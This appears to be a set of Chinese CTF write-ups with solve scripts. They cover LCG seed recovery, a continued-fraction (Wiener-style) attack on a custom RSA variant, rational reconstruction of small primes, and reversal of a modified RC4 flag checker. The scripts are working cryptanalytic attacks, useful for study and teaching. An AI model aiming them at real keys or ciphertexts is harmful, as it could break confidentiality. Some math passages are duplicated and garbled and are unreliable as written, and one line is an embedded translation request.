        pivot = None
        for r in range(col, 3):
            if M[r][col] % mod != 0:
                pivot = r
                break
        if pivot is None:
            raise ValueError("Singular matrix modulo, cannot solve uniquely")
        # 交换当前行和 pivot 行
        if pivot != col:
            M[col], M[pivot] = M[pivot], M[col]
            Y[col], Y[pivot] = Y[pivot], Y[col]
        # 规范化当前行：使主元为1
        inv_p = modinv(M[col][col], mod)
        for j in range(col, 3):
            M[col][j] = (M[col][j] * inv_p) % mod
        Y[col] = (Y[col] * inv_p) % mod
        # 消去下面行的列 col
        for r in range(col + 1, 3):
            factor = M[r][col]
            if factor != 0:
                for j in range(col, 3):
                    M[r][j] = (M[r][j] - factor * M[col][j]) % mod
                Y[r] = (Y[r] - factor * Y[col]) % mod

    # 回代
    X = [0, 0, 0]
    for i in range(2, -1, -1):
        val = Y[i]
        for j in range(i + 1, 3):
            val = (val - M[i][j] * X[j]) % mod
        # 由于主对角现在应该是 1
        X[i] = val % mod
    return X

# --- 1) 用已知的 x3..x7 解出 a,b,c ---
# 三个方程（模 n）：
# x5 = a*x3 + b*x4 + c
# x6 = a*x4 + b*x5 + c
# x7 = a*x5 + b*x6 + c
A = [
    [xs[0] % n, xs[1] % n, 1],
    [xs[1] % n, xs[2] % n, 1],
    [xs[2] % n, xs[3] % n, 1],
]
B = [xs[2] % n, xs[3] % n, xs[4] % n]

a, b, c = mod_solve_3x3(A, B, n)
print("Recovered parameters:")
print("a =", a)
print("b =", b)
print("c =", c)

# --- 2) 验证 a,b,c 是否正确（代回产生 x3..x7） ---
def gen_sequence(x1: int, x2: int, a: int, b: int, c: int, n: int, length: int) -> List[int]:
    s = [x1 % n, x2 % n]
    for _ in range(length - 2):
        s.append((a * s[-2] + b * s[-1] + c) % n)
    return s

# 我们还不知道 x1,x2，但可以用解出的 a,b,c 验证（使用后面求出的 x1,x2）
# --- 3) 用 a,b,c 与已知 x3,x4 求回 x1,x2 ---
# 等式：
# x3 = a*x1 + b*x2 + c  -> a*x1 + b*x2 = x3 - c
# x4 = a*x2 + b*x3 + c  -> a*x2 = x4 - c - b*x3
# 所以可以先解出 x2（若 a != 0 mod n），再由第一个方程求 x1。
rhs1 = (xs[0] - c) % n  # x3 - c
rhs2 = (xs[1] - c - (b * xs[0]) % n) % n  # x4 - c - b*x3

if a % n == 0:
    raise RuntimeError("Unexpected a == 0 (mod n); solver does not handle this degenerate case.")
inv_a = modinv(a, n)
x2 = (rhs2 * inv_a) % n
x1 = ((rhs1 - b * x2) * modinv(a, n)) % n  # using inv_a again

print("\nRecovered seeds (x1, x2) -> flag halves (as integers):")
print("x1 =", x1)
print("x2 =", x2)

# --- 4) 将两半转换为 bytes 并拼接，输出 flag ---
# 注意 bytes 长度需要合适的字节数；使用 long_to_bytes 自动去除前导零。
part1 = long_to_bytes(x1)
part2 = long_to_bytes(x2)
flag_bytes = part1 + part2

print("\nFlag bytes (raw):", flag_bytes)
try:
    flag_str = flag_bytes.decode()
except Exception as e:
    # 若不能直接 decode，尝试剔除可能的尾部 NUL 或补齐方式（通常题目是 ASCII 可解码）
    flag_str = flag_bytes.decode('latin-1')

print("\nRecovered flag string:")
print(flag_str)

# --- 5) 额外验证：用 recover 的 x1,x2 重新生成序列，确认与给定 s3..s7 一致 ---
recreated = gen_sequence(x1, x2, a, b, c, n, 7)
# We printed x3..x7 originally are recreated[2]..recreated[6]
print("\nVerification: recreated x3..x7 match given values?")
for i in range(2, 7):
    print(f"x{i+1}:", recreated[i] == xs[i-2], "(recreated:", recreated[i], "given:", xs[i-2], ")")

注意到 challenge.py 中的 phi = (p^4-1)*(q^4-1)，而 e = invert(phi - d, phi)，因此有
e(ϕ−d)≡1(modϕ)⇒ed+1≡0(modϕ),
e(ϕ−d)≡1(modϕ)⇒ed+1≡0(modϕ),

即存在整数 kk 使得 ed+1=kϕed+1=kϕ。

又有 ϕ=(p4−1)(q4−1)=N4−p4−q4+1ϕ=(p4−1)(q4−1)=N4−p4−q4+1。于是
p4+q4=N4−ϕ+1,
p4+q4=N4−ϕ+1,

且 p4p4 和 q4q4 是方程 x2−S4x+N4=0x2−S4​x+N4=0 的根（其中 S4=p4+q4S4​=p4+q4）。

由于 ϕϕ 与 N4N4 的相对误差极小（ϕ=N4−p4−q4+1ϕ=N4−p4−q4+1），所以可以把 e/ϕe/ϕ 近似为 e/N4e/N4。用 连分数（Wiener 风格思路）在 e/N4e/N4 上寻找收敛分数 k/dk/d（其中 dd 在生成时被限制在一个上界内）。

对每个候选 k,dk,d 检查 (ed+1) mod k==0(ed+1)modk==0。若成立，令 ϕ=(ed+1)/kϕ=(ed+1)/k，计算 S4=N4−ϕ+1S4​=N4−ϕ+1，检验判别式是否为完全平方，从而求得 p4,q4p4,q4，再开 4 次方根得到 p,qp,q。

得到 p,qp,q 后重建 ϕ=(p4−1)(q4−1)ϕ=(p4−1)(q4−1)，计算解密指数 ddec=inv(e,ϕ)ddec​=inv(e,ϕ)（注意 ddec=ϕ−dddec​=ϕ−d），用它对 cc 解密得到明文。

#!/usr/bin/env python3
# exploit.py
# 完整脚本 - 恢复 p,q,phi 并解密 c 来得到 flag
# 需要: Python 3.8+，pip install pycryptodome

from math import isqrt
from Crypto.Util.number import long_to_bytes
import sys

# 题目给定的参数（直接复制题目里的大数）
N = 7009140135538215028924914591953414074505824371880453202310674464290579630112184869680780386266634863567143064636583736239446773912559972762673290920619507
e = 1135381146784552400612767760932435707698084457988303590428221854036525794872172053094546630518216399122007374916128936410389437857599229376110540792379117312465869500264627353923059848306738553769546570599180846282241428984164575855184663178972389892542981425074384819217530748327916980848145388121265755729872253672962906762405721815797743426896967321325246153744509749211298761492863057814285420042814076873124822637586565032131105270129696425783244303841851286492233591916152043031497081154381215978234339681650378604394871198590617148592246569286378146421505735444022639992665544918258807563285013540025538840407
c = 362932788475543549779762136345370461729018790042506077599524894328299068709144013724079744419753585417365223988382489250707790171043999830067738601143593

# 辅助：计算连分数表示
def cont_frac(a, b):
    """返回 a/b 的连分数系数列表"""
    coeffs = []
    while b:
        q = a // b
        coeffs.append(q)
        a, b = b, a - q * b
    return coeffs

# 辅助：生成收敛分数（numerator, denominator）序列
def convergents_from_cf(cf):
    """yield (num, den) for each收敛分数"""
    p0, p1 = 0, 1
    q0, q1 = 1, 0
    for a in cf:
        p = a * p1 + p0
        q = a * q1 + q0
        yield p, q
        p0, p1 = p1, p
        q0, q1 = q1, q

def is_perfect_power4(x):
    """检测 x 是否为某整数的四次方，返回 (True, root) 或 (False, None)"""
    if x <= 0:
        return False, None
    # 首先开二次方（整数），再对结果再开二次方
    r2 = isqrt(x)
    if r2 * r2 != x:
        return False, None
    r4 = isqrt(r2)
    if r4 * r4 * r4 * r4 == x:
        return True, r4
    return False, None

def main():
    print("开始攻击（这可能需要一些时间，取决于大整数运算）...")
    # 按 challenge 中的 limit 公式计算 limit
    # 注意：challenge.py 中的 phi 使用 (p**4 -1)*(q**4 -1)，他们用的 limit 公式里 N**4 和 N**2 均出现
    N2 = N * N
    N4 = N2 * N2
    # 复制题目里相同的 limit 计算式（原题用浮点开根号）
    # limit = int(((2 * N**4 - 49 * N**2 + 2) / (4*N + 170*N**2)) ** 0.5)
    # 为避免浮点精度、用整数开根号：
    num = 2 * N4 - 49 * N2 + 2
    den = 4 * N + 170 * N2
    if den <= 0:
        print("den <= 0, 无法计算 limit，退出")
        return
    limit = isqrt(num // den)  # 整数近似
    print(f"Computed limit ≈ {limit}")

    # 计算 e / N4 的连分数，这样其收敛分数 p/q 近似等于 e/phi，其中 q 是候选 d，p 是候选 k
    print("计算连分数（e / N^4）……")
    cf = cont_frac(e, N4)
    print(f"连分数长度: {len(cf)}")

    # 遍历收敛分数
    tried = 0
    for idx, (k, d) in enumerate(convergents_from_cf(cf)):
        tried += 1
        if d == 0:
            continue
        # 按 challenge 的生成条件，d 在 [1, limit]
        if d > limit:
            # d 超过限制，继续但可以跳过大量更大的 d
            continue
        if k == 0:
            continue
        # 必要条件： (e * d + 1) % k == 0
        ed1 = e * d + 1
        if ed1 % k != 0:
            continue
        phi_cand = ed1 // k  # 可能的 phi 值
        # 计算 S4 = p^4 + q^4 = N^4 - phi + 1
        S4 = N4 - phi_cand + 1
        if S4 <= 0:
            continue
        # 判别式 D = S4^2 - 4*N^4
        D = S4 * S4 - 4 * N4
        if D < 0:
            continue
        sd = isqrt(D)
        if sd * sd != D:
            continue
        # 可能的 p^4 和 q^4
        p4 = (S4 + sd) // 2
        q4 = (S4 - sd) // 2
        if p4 <= 0 or q4 <= 0:
            continue
        # 检验 p4,q4 是否严格为整数四次方
        okp, p = is_perfect_power4(p4)
        okq, q = is_perfect_power4(q4)
        if not (okp and okq):
            # 有可能 p4,q4 的排列相反（p4 <-> q4），尝试交换
            okp2, p2 = is_perfect_power4(q4)
            okq2, q2 = is_perfect_power4(p4)
            if okp2 and okq2:
                p, q = p2, q2
                okp, okq = True, True
            else:
                continue

        # 验证 p*q == N
        if p * q != N:
            print(f"找到候选 p,q 但 p*q != N (idx={idx}), 跳过。p*q={p*q}")
            continue

        print("成功恢复到 p, q！")
        print(f"p = {p}")
        print(f"q = {q}")

        # 计算 phi = (p^4 - 1)*(q^4 - 1)
        phi = (p**4 - 1) * (q**4 - 1)
        # 由 challenge.py 中 e = invert(phi - d, phi)
        # 所以原始的私钥指数是 (phi - d) 的模逆的逆，即解密指数 d_dec = inverse(e, phi) = phi - d
        # 但更稳健的做法是直接计算 modular inverse of e modulo phi
        try:
            # Python 3.8+ 有 pow(..., -1, mod)
            d_dec = pow(e, -1, phi)
        except TypeError:
            # 兼容写法
            from math import gcd
            def egcd(a,b):
                if b==0: return (1,0,a)
                x,y,g = egcd(b, a%b)
                return (y, x - (a//b)*y, g)
            inv = None
            x,y,g = egcd(e, phi)
            if g != 1:
                print("e 与 phi 不互素，无法取逆")
                continue
            d_dec = x % phi

        print(f"解密指数 d_dec (模 phi 逆) = {d_dec}")

        # 用 d_dec 解密
        m = pow(c, d_dec, N)
        try:
            pt = long_to_bytes(m)
            print("解密得到的明文（bytes）:")
            print(pt)
            # 尝试以 utf-8 解码
            try:
                print("解码为 UTF-8：")
                print(pt.decode())
            except Exception:
                print("无法以 utf-8 解码，可能不是纯文本")
            return
        except Exception as ex:
            print("转 bytes 失败:", ex)
            return

    print("遍历完收敛分数未成功找到 p, q。尝试扩大搜索或检查实现细节。")
    print(f"总共尝试了 {tried} 个收敛项。")

if __name__ == "__main__":
    main()

由题意有两个方程：m≡x1a1(modp),  m≡x2a2(modp)m≡x1​a1​(modp),m≡x2​a2​(modp)。因此有关系 x1a1−x2a2≡0(modp)x1​a1​−x2​a2​≡0(modp)。

令 r≡x1−1x2(modp)r≡x1−1​x2​(modp)，则 a1≡r⋅a2(modp)a1​≡r⋅a2​(modp)。已知 a1,a2a1​,a2​ 都是约 255-bit 的小质数，可以用 有界有理重构 / 扩展欧几里得（rational reconstruction）从 rr 对模 pp 的表示中恢复出这对小整数。

恢复出 a1,a2a1​,a2​ 后，计算 m=x1⋅a1 mod pm=x1​⋅a1​modp，再转回字节即可得到 flag（原始 flag 被右补齐到 64 字节）。

from Crypto.Util.number import *
from gmpy2 import invert, gcdext

# 已知数据
p = 9288057777074991122762005070226773704741526141106122593461444404516109250872861628999695264397891155768852415308746271449950642336303576227335601954540989
X = [
    3964962861849862081325153868672212944776909099780173967838951427968185807380427046686616501193276713728480557549840802988355316584948861520133831585517939,
    3723458927212267492415472843691561592306694198214161990325036133376475232648250912240147719114167006545035115141392906851216747778941445390708099352833316
]

# Rational Reconstruction
def rational_reconstruction(r, N, bound):
    """
    从 r (mod N) 恢复分数 a/b，其中 |a|,|b| <= bound
    """
    # 扩展欧几里得
    t0, t1 = 0, 1
    r0, r1 = N, r
    while r1 > bound:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        t0, t1 = t1, t0 - q * t1
    a, b = r1, t1
    # 保证分母正数
    if b < 0:
        a, b = -a, -b
    return a, b

# 计算 r = x1^{-1} * x2 mod p
x1, x2 = X
r = (invert(x1, p) * x2) % p

# a1, a2 大约是 255 bit，设 bound 稍微大一些
bound = 1 << 260
a1, a2 = rational_reconstruction(r, p, bound)

print("[+] a1 =", a1)
print("[+] a2 =", a2)

# 验证 m 相等
m1 = (x1 * a1) % p
m2 = (x2 * a2) % p
assert m1 == m2

m = m1
flag = long_to_bytes(m).rstrip(b'a')  # 去掉填充的 'a'
print("[+] flag =", flag.decode())

[+] a1 = <某个255bit质数>
[+] a2 = <某个255bit质数>
[+] flag = HnuCTF{78662c2c-4a89-4a66-a952-be9e5542a775}

please translate above text in 繁体中文, 并且和原文一段一段对照输出 note: if there is some word nonsense, please do not translate

// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char Buf1; // [rsp+20h] [rbp-50h]
  __int64 v5; // [rsp+47h] [rbp-29h]
  char v6; // [rsp+4Fh] [rbp-21h]
  __int64 Buf2; // [rsp+50h] [rbp-20h]
  __int64 v8; // [rsp+58h] [rbp-18h]
  __int64 v9; // [rsp+60h] [rbp-10h]
  __int16 v10; // [rsp+68h] [rbp-8h]

  _main(*(_QWORD *)&argc, argv, envp);
  Buf2 = -998315817414606435i64;
  v8 = 4777327432723964003i64;
  v9 = 8585371526638873580i64;
  v10 = 457;
  v5 = 8606208933757937005i64;
  v6 = 0;
  printf("plaese input your flag:");
  scanf("%s", &Buf1);
  rc4_crypt(&Buf1, (__int64)&v5);
  if ( !memcmp(&Buf1, &Buf2, 0x1Aui64) )
    puts("congratulation,you get the flag!");
  else
    puts("sorry,you are wrong!");
  return 0;
}

读入输入字符串 Buf1

用 rc4_crypt 这个函数，对输入和一个密钥（v5）进行 RC4 加解密

对加解密后的结果和一个常量密文（Buf2、v8、v9、v10）进行比较

如果相等，就说明输入的是正确的 flag

__int64 __fastcall rc4_crypt(const char *a1, __int64 a2)
{
  unsigned int v2; // eax
  __int64 result; // rax
  char v4[271]; // [rsp+20h] [rbp-60h]
  char v5; // [rsp+12Fh] [rbp+AFh]
  int v6; // [rsp+130h] [rbp+B0h]
  unsigned int i; // [rsp+134h] [rbp+B4h]
  unsigned int v8; // [rsp+138h] [rbp+B8h]
  unsigned int v9; // [rsp+13Ch] [rbp+BCh]
  char *Str; // [rsp+150h] [rbp+D0h]
  const char *v11; // [rsp+158h] [rbp+D8h]

  Str = (char *)a1;
  v11 = (const char *)a2;
  v9 = 0;
  v8 = 0;
  v6 = strlen(a1);
  rc4_init(v11, (__int64)v4);
  for ( i = 0; ; ++i )
  {
    result = i;
    if ( (signed int)i >= v6 )
      break;
    v9 = (unsigned __int8)(((unsigned int)((signed int)(v9 + 1) >> 31) >> 24) + v9 + 1)
       - ((unsigned int)((signed int)(v9 + 1) >> 31) >> 24);
    v2 = (unsigned int)((signed int)((unsigned __int8)v4[v9] + v8) >> 31) >> 24;
    v8 = (unsigned __int8)(v2 + v4[v9] + v8) - v2;
    v5 = v4[v9];
    v4[v9] = v4[v8];
    v4[v8] = v5;
    Str[i] ^= v4[(unsigned __int8)(v4[v9] + v4[v8])] ^ 0x66;
  }
  return result;
}

它调用了 rc4_init(v11, v4)，v11 就是 main 里传进去的 &v5 —— 也就是说密钥是从 v5 开始的一段内存（可能包括 v5 和 v6 甚至后面的 padding）。

在标准 RC4 输出的 keystream 基础上，它额外做了一个 ^ 0x66 的异或。

size_t __fastcall rc4_init(const char *a1, __int64 a2)
{
  size_t result; // rax
  unsigned int v3; // eax
  char v4[259]; // [rsp+20h] [rbp-60h]
  unsigned __int8 v5; // [rsp+123h] [rbp+A3h]
  __int64 v6; // [rsp+124h] [rbp+A4h]
  int i; // [rsp+12Ch] [rbp+ACh]
  char *Str; // [rsp+140h] [rbp+C0h]
  __int64 v9; // [rsp+148h] [rbp+C8h]

  Str = (char *)a1;
  v9 = a2;
  result = strlen(a1);
  v6 = (unsigned int)result;
  for ( i = 0; i <= 255; ++i )
  {
    *(_BYTE *)(v9 + i) = i;
    result = (unsigned __int8)Str[i % (signed int)v6];
    v4[i] = result;
  }
  for ( i = 0; i <= 255; ++i )
  {
    v3 = (unsigned int)(((unsigned __int8)v4[i] + *(unsigned __int8 *)(v9 + i) + HIDWORD(v6)) >> 31) >> 24;
    HIDWORD(v6) = (unsigned __int8)(v3 + v4[i] + *(_BYTE *)(v9 + i) + BYTE4(v6)) - v3;
    v5 = *(_BYTE *)(v9 + i);
    *(_BYTE *)(v9 + i) = *(_BYTE *)(v9 + SHIDWORD(v6));
    result = v5;
    *(_BYTE *)(SHIDWORD(v6) + v9) = v5;
  }
  return result;
}

def rc4_init(key: bytes):
    S = list(range(256))
    j = 0
    key_len = len(key)
    for i in range(256):
        S[i] = i
    for i in range(256):
        j = (j + S[i] + key[i % key_len]) % 256
        S[i], S[j] = S[j], S[i]
    return S

def rc4_crypt(data: bytes, key: bytes):
    S = rc4_init(key)
    i = 0
    j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256] ^ 0x66  # 特殊改动
        out.append(byte ^ K)
    return bytes(out)

def to_le_bytes(val, length):
    return val.to_bytes(length, 'little', signed=True)

# 密文拼接（小端）
Buf2 = to_le_bytes(-998315817414606435, 8)
v8   = to_le_bytes(4777327432723964003, 8)
v9   = to_le_bytes(8585371526638873580, 8)
v10  = to_le_bytes(457, 2)
cipher_bytes = Buf2 + v8 + v9 + v10  # 共 26 字节

# Key (只取 v5 小端 8 字节)
v5_val = 8606208933757937005
key = v5_val.to_bytes(8, 'little')

# 解密
flag = rc4_crypt(cipher_bytes, key)
print(flag.decode())